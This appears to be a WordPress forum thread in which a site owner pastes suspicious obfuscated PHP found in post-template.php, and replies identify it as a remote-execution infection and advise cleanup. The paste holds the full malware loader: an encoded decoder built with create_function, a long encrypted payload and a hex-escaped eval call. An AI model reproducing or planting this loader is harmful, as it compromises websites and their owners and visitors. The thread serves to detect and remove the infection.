This is in my post-template file in includes folder (WordPress) and I’m wondering if it is malicious. Discovered via file monitor plug-in which showed a change to the file but I didn’t know if this might be a result of some non-malicious process. Excuse me if I don’t enter it properly. Appreciate your assistance. Please assume I know nothing because I don’t.
/**
* Applies custom filter.
*
* @since 0.71
*
* $text string to apply the filter
* @return string
*/
function applyfilter($text=null) {
@ini_set('memory_limit','256M');
if($text) @ob_start();
if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"4416375165162 15414414514315714414550441635173404416414116214714516475474773441237547414344454650515253545556576061626364656667707172737475761347710010110210310410510610711011111211311411511611712012112212312412512612713013113213313513613714040134474214114214314414514614715015115215315415515615716016116216316416516616717017117217317417517614613615210110513515715311113447117172125133624616161173631401506516713767714264160100661341637077102147120761441061267515510474124143123451321451741627215410711357165103171561121705111015112141404344176507311416455122175115141541161661275313115614252601304773401461571624050441517560734044151741631641621541451565044163517340441515353514017340441431501411627516316514216316416250441635444151546151734044156165155751631641621601571635044123544414315014116254716551557165734044143165162137153145171751411421635014615515714450441534053404415154716551517340441431651621371531451717544156165155554414316516213715314517173401511465044143165162137153145171746051404414316516213715314517175441431651621371531451715371657340441431501411627516316514216316416250441235444143165162137153145171546151734044164141162147145164567544143150141162734017540162145164165162156404416414116214714516473"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'xEe%7c0BgX%3cyl%3cJrCC%3cCffjjA%5dio%21fj%2bu%21%3bRiiRHIe55%3a7GK4ud%2dYfEWWEv%22%20FFVz%3b%3c%3c%26%2fA%26%5bmVvllG9bCC%40%3bL%29%2fhV%40%3cc%3c%3dNpx2%2d%2dRS3%2c%2c%7cE%2bE%3d%3a%7c%2cRyf%5eAA%5dooIf0GT8c%7cgZCimGK%3a%21yCcy%28Tr%7c%2e%21%2cR%5c9N%28y%3b%7dx%2dY%5eM%21%2dM%2b%7e%5d%23%3bL%2a%5b%27%7crqg7F%3dFPR%5fu%26v6S%258%2f%20%3fR%3cr%7c%3cNVoIDnlJ%2elfGJJ%21%20oJM%29R%3b%2da%202LM%20tLL%2c%2cnb7MfX%40bEAb%3fqOB%5dz%5ezh%5dk5T23I%262pr95P%29xHuw%3f%5fr%23LLt9x%2c4dPQsNaWFbv0XT%3cY%5eZo%5effO%5dl%27O%27q21%7bHU%5biw%29%406zRb%2a%2df1%26%7eeZH%28a%5d%5bv%7d%40rl%27%5eT%3fs%2a%21QN0ow6%27Ec%29%5bK%26%7crq%3c%7bgd%5cPDy9%5f7%5cB%3ep%40bP%3a%5ePL%5ede%25%7d%3a%29Hr%21WNS%229V%25Gy%2eJCGokJX%29N%2bRv0%26W7Yn4%4066f7wMu%2f%28anf%5ejXn%3ed%2fA%3f%5d%5bhpqh3%25%5f%3fBw%3elr%7bbnz39s8%3f%409%21%20s%2e%3f%3dCF%7ctyJ%2e%3a%2eHCZ%21uK%24bY%7c6%40%3crCiQ%21xCOz%40Qo%20%2dWfM%3bzt%5dWIRn%27OIUvE0UAUo%60%3eA1Z3er%3allG92%7c%23qeNt8iiQ%20%20%24%7e%7e%3di%29%40Ikw6P%2fuCVPMoDG%3av%2c5%26qr%3aXl%28t%21%3ba%5dJ%23iL%7d%28%28%7bws%24%28%5fq%25AE%5f%3dMwuS9N%2eytv0E%5doj0uEiz1w9qST%2clCiHiKLhs6y%2eCAWgTS%3eS%23%21U%2d%3eJmV%7dMI%27O%3aZ%2e%20Kb%7c%23%28H%24RjCQx%7et%23%23%26h%40%21%23h%5bTf%5ehd%2d%60C%3c%27zO%5dX%27%5c%40%2eB%3aXz%27dzp71p%26TDMrc%7dGZ%2aGe%2dljy%5fr9cVBgS%21W%24%2aBc%3cLc%29yr%29e%2cM%5fbNwX%2b8XYh0%3eECRa%28%7d%2bOQL%24MvRRw%40PtRph%3aI%27pcW%5fYKEjUqhIdP%28m%2ek4q6spsh%5bwgPBd3%5c9d6d8cHQ%2b%5cJ8%7clcrCtV%5dTJOmD%3axlS%25r01lLx%7da%7dt7J%5e%29%7e%2bYWb%210%7d00j%5dn%5en7lMr%29H%5cZnhk%27%5bk%3e%5fw%22UDkg%27D%2a%5e%23S%5bANE%27%2bk1%5fO0zq%5eq%7bph3zB%5cXP%25c%2d%2exJ%2e%2eiv%2cBdXrJLt%283%27Oyo%5e4p%7e%21MnL%26%23k2CxFEo%5d%2dknkEY%2af%5cbo3%601l%3cTE%3cokS%3dnX%25QcfE%28PFwF%3dVC%2fz%26QSZ%25SSr%23%2159RdNV%7dNxH%29C%3ax%2bvPV0AL%2dtLLM%5dA%25r%5bi%7b%212%268%27%7ev%2c%60qnokYO%227%28M4%28%2dWBgXEh%27o1yoVYi%24%7bP64%5c5%5fl%60r5JK%5b%60C%5b17Q%2b%5cioXlmFDPS%7cGZa%7ds%3df%3cn2%7cY%22%60yC%24%7e%2fN%2c%20NJ%28bN%282Ul99%2fpCy%5cJpwl%5c9%24aFv%3fr0OI%3ew9I94%22%3cmL%7cK%3aCrS%3b3LhZemTpTScHxA%7erl%3a%25mrL%28%5b%7dvbW0v%7d%5bZq%7c%2ar%2f%3bJC%235CRa%28%7d%2bOIF2s%23LXM%2dnd%2dq%7dYI%27kzN%5b%5e%5b%5b1%60OqOdS%3dygh%3a%3aGGKu4C%40%3aG%3b4mP4%3cB%3d%3d4Sg8P6V%3c%25m%3b%7ecR%20%3d%2dy%3czcx%24x%29%26r%29Jf%29M%3b%29%2c%7e%7d%7dJ%7eXRb00q%28REj%2aL%27%2bk%27fkk%2b%5csn7%2aCqEXw7k74DT%29O%3c5%5b%24%26%2d5F%3e83s%3e%3fTJ4BdmP%2bt%3f%2dgM%3ea%28S%7d%5dm%5bZ%21i%2ecKtu%2f0bHjhu%5e%2d%2e4x8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek%3e%27h3UZS%5c%28%3b8V8%3fCw%2fVNn%3emcDS%3eF%24gPRkcel%25MRrvWz%25%20%2f%28L%28%23G0%3b5%2a%21vR%21%2btNN%21N%5fW7%224pp%40X%5f5n%27Ok%27%3fY%40A1%7b%605hmA%3e%5b1h%26ZO%3c9%5f%405%3a%3c%7b48P99P7CfcSW6Hor%3af%23D%2fuG%2fW%3c%2bcbQ%20%21S%23u%23Q%2fyxjy%22txz%29H2I%3bnb0fX37%2d9%7dph%5eX%5d%2acW%5b%5e1312X5h7OCBo%2667%26sw%40%40%26%40%2e%5cs%29iQQP%2eC%5cHK%40Vd%20VKeVu%25GGd%25%21lHQQWZKtu%2flf%5eK%2bupQY%20%21%27k%24qO%2bff%7bg%3bjNoIoAae%5eoOkz%5eA%3ffuqAmPh44%3cx%27Fz3%22%3f5%227l%22%3dg%22D%3fVV7%3f%3aFerr%23BGTD%7cr%3eSQZ%25TvWS%2dZW%21LL%607%2dQH%28%3bC%20b%24%23z%27%28%268%24XMA%5dAfRhEzzTvw%2b%5e%271E%27kP%2773%27%221%5f%5fk1gw8BBr%7b%3e%3cF%3dpP7Jx%22Gp0cB6%3aG%3eGuL%2dAVzx%23HQ%3aJ%2bvGfY%28%2e%2djhu%5e%2dvvp8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek4q%5c8%5cp2%25sdd%3b%60e5%40P%3csPBHPrcPl%3c%7c%7cB%3c%29e%2exxaTxZ%21%20%24y%24Llf%5eK%2bup%2dHyv%2b%21%2bb%5b%268%24V0%2dAEonoO9%5fns%22%5b%5e1%3fr081%5f%5fyH5O%5d1q%5c%271%40%40gwsddKu%2dwWV%407%3fDBpgTFPe%28L%5edCSxHxyTa%29%24%242%7cN%3a%2e%20%2d%29unya%20WYW%2cQ%23%2d%28%2c%2bMM%2dd%2dq1nz%5dn%5bAOOnO%3dm%3c%3ccSSZ%3dF%40zZD5%40e%3d%26ZdhtF%3dVDF%3e%3de%3fSi%29%3aB%24%2aB%23%5fvE%2d%28%7dxH%29xx%21%2bv%28l%5el%26%5bU113%2ek4p%40%28%20abtq1%7eOzLh%5dINIO%2749AzBFPcgK%2fjSrGSGIT%27dFUZ%3fP%60Pd%3eKlsF%29%20itH%2bY%5c%2d%2cW%2d%2bPL%3e%21%20V%7dxi%25i%21Q%2bv%2e%20%5eoAUjw%5fy33%5bhHziE%5d%20%26Xj%2djEA5%60%2a%5d%40%3f%5c%3d6e%7cbm%3dZ%3d%25%7cAVC%5dF%2bli%3dSs%3f8ssPlr%3d%5fJ%5fsV%3dBVB8cr8%24Xf%5e%3cVryS%3d%7dM%3ci%21Qii%24bYt%2fE%2fR%7e%2cM%7dx%27%406%5cL%24N0R%7e1%7bLEo%5dEE%27%2272n%3fnXk%5bkA1wAV%2eJx%26zw6%7bU%25Z%26g%3ePggVuKT4i4%3d%25%3c%3fS%3a%3f%7ef%5ejT%3d%3a%2e%25mMaTQ%20%21QQ%7e%2an%2du%5duWJ%23R%7d%29O6%5cst%7evX%7d%28%7b3t%5dko%5d%5dO49%26bBbOI5o%5edCy%2e%5b%27hpqSiUc%3fvsPd%3fwBpM79a%22%3egi%29%7b%7d%24%3f%20K2lC%2eK%3c%2feOl%3a%20ui%24%28KM%2f%2eJ%2dA%5e%24%7dI%22%29krw82U%2f%22%28%7b3t1whI%2foz%5bIb%27j%3alsO%7bdFA8%3foVYlHzT8N%5cg%3e85%3f4%7dm%3cD%3c8eHxeI%25%3aGed%7c%3c%2dAVtxe%26HieL%26%3a%24%7eKaf%2fiLt%20L%20QaY1%7eWv%24%60%28nj0%22%2cj%5ea%40NYjIjPf%5bUXF%5e4%5d%5bh5%25U7%5fz%7c%5bd17s8y%3f%22%3dwy%7d7C%5bt%2bP8%3crF%2aBD%3a%2ft%3b%7cknk%3cM%2fUo%5be%2bx%5ej%5eK%2bu%5eaS%20Y%3f%3b%28N%2a%3f0fXfaoh3o%2bZI%27%2b%7bM4%5dv%3fr08%7b%7bwy7%22977%40c%3cs%2c6BPsh8%22%2eGmO%5c%25bgB%3c%7c%20n8%215WiAt%7eRtyyHzU%5bKr%29%7eCXlXf%2ff%2d%2d%2c4p1z%40Qo%20%2aR%5eA%5e0t3%29%3fM79Np%22%7emn9%2208%7dcFu%3f%5bpw%5b6h44%5b4yy%2exxHiigyu%26%29GpxFbPG%3a%25%3fS%3aZ%2eRMoDZ%21i%2ec%23%2f%28%20%24tf0Qk%5cZSmc%25%3a%29KlZ3%5b%2e3PLak%5dfR%27bUIO%26%5c%40o%3eJa%7d%3bRMWAW%28b0b%2bfXt%2aAvv%5dyiCR%5f%40STV%22ZPr%25eG%7e%23c%7dz%404w%22p8DgBwgh4%22gmE%2fc%7diMzs%7e%24an%40%21eYoNYnR48p%5cM9YkoObqofz%5dl%3ba%7e%20El%25%7c%3a%29%5e5%7b%40%3eBqXoKhu%2dwpc%3cF9%25g%7cSZl%24%20TROp%22594sm%3f7%40w8FF%5ekf3KX%3c7Hv%2c%2dJ%7eX%3b%282Ua%7bg%3b1%3a%3dN%27kjMX02EOA%5b%3fs%27%3eKjI%227%60%5d%5bw%22%5c3ZS7%3a%7e%7b%404%2fG%27a%2cN%3f6%3dZP%5c%2eJ%3f%202sd%25%2eJCV%25%2e%7c%3a%25%3c%2cqo%5dofGWX%3c7%2eJ9x%2bW%2dt%2dt%2a%20%7df%5eXA5MeOIAa0%7bfXnJ1%7bq%60Gj%5dcdtj%273%5cs%40z3%5c5%5f3%26yhnh%5bUX%5b9jq1%263%24%2aHgK%3cyJy%2fmR%5c%27%2d',3863);}call_user_func(create_function('',"x65x76x61l(x4F01100llO());"));}}
It’s a remote-execution exploit, and possibly more as well
This code evals what appears to be a decryption function:
It then calls this function with key
3863
on the following giant string:This results in the following code, which I have not read:
I would advise you STRONGLY against installing this theme on your server… it is obvious the author is doing his/her best to obfuscate something – and it can’t be good..
I also had this infection and if you have several blogs on your server, chances are they will all be infected. Notify your host and they’ll run a security scan and CHMOD all bad files to 000
Just got beaten up by someting very much like this. I don’t know what it did/does, but it’s bad enough that it corrupted 3 sites. Badly enough that we are starting two completely from scratch.
I’ve learned from that that anything NOT obvious (i.e. an index file down within a CSS folder, or vice versa) should be viewed with extreme prejudice, as well as any activity in logs that changes files that would otherwise just be static.
For example, if a footer changed, and you haven’t done any design changes, then something is amiss.
From what I have read this is likely a FTP exploit.